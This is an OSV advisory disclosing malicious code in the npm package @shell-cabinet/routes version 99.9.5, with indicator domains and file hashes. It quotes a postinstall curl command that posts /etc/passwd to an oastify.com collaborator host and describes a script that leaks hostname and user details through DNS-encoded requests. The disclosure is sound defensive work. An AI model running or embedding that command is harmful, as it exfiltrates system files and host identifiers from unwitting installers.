MAL-2026-5428

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@shell-cabinet/routes/MAL-2026-5428.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-5428

Published

2026-06-09T17:18:53Z

Modified

2026-06-09T18:01:32.755041188Z

Summary

Malicious code in @shell-cabinet/routes (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (b385f020626d8bad774fe5ebd776683b547bea4edef85944af658fd0155924ad)

On npm install, the package's postinstall hook runs curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com, posting the installer's /etc/passwd to a hostname-prefixed subdomain of oastify.com (a Burp Collaborator out-of-band channel). The same postinstall first executes scripts/scream3gg.js, which hex-encodes os.hostname(), os.homedir(), and os.userInfo().username and issues plain-HTTP fetch() requests with the hex chunked into subdomains of nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com, leaking host identifiers over DNS-encoded HTTP. Both behaviors fire unconditionally at install time and have no relationship to any documented package functionality.

Database specific

{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-06-09T17:18:53Z",
            "versions": [
                "99.9.5"
            ],
            "sha256": "b385f020626d8bad774fe5ebd776683b547bea4edef85944af658fd0155924ad",
            "id": "IN-MAL-2026-005023",
            "source": "amazon-inspector",
            "import_time": "2026-06-09T17:45:49.612418024Z"
        },
        {
            "modified_time": "2026-06-09T17:18:53Z",
            "versions": [
                "99.9.5"
            ],
            "sha256": "d8dcb342941bc75e4b1f4ff0b757d193f681b483a32295dc331468cd2dc1e616",
            "id": "IN-MAL-2026-005024",
            "source": "amazon-inspector",
            "import_time": "2026-06-09T17:45:49.659171381Z"
        }
    ]
}

References

https://www.npmjs.com/package/@shell-cabinet/routes/v/99.9.5

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / @shell-cabinet/routes

Package

Name: @shell-cabinet/routes; View open source insights on deps.dev
Purl: pkg:npm/%40shell-cabinet%2Froutes

Affected ranges

Affected versions

99.*

99.9.5

Database specific

indicators

{
    "domains": [
        "7363616e2d636130376335616366366233.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com",
        "2f686f6d652f7363616e.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com",
        "7363616e.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com"
    ],
    "evidence_files": [
        {
            "sha256": "eda57c69d61e98fd57162568b1c0fc5efab6667660c7bfdc911dc86ee46320f6",
            "tlsh": "86d0a7b07800c673bedd06a34128a1817955c85f2214b96256df86e4a114761a4e6516",
            "path": "package.json"
        },
        {
            "sha256": "9b962b07165e35cb12a1424434b1d1be779ead9b43df94af8baf0e5a1b66a6c9",
            "tlsh": "74f08ba955b11938382b50819dafd40db1e7fa0630a6e4f2fedd86810f44865bd22dde",
            "path": "scripts/scream3gg.js"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-qdRAUXJb4ZV0GlLaKvsCgB55xamZ5c+i4+RFoJ9OyR72irI38mXq1ICIk3ZL64FQyu75UUINdY6t2x6InaA1mg==",
                "sha1": "6bfb1133e5f75d2e5507150c837267fd322a4a26"
            },
            "filename": "routes-99.9.5.tgz"
        }
    ]
}

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@shell-cabinet/routes/MAL-2026-5428.json"

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]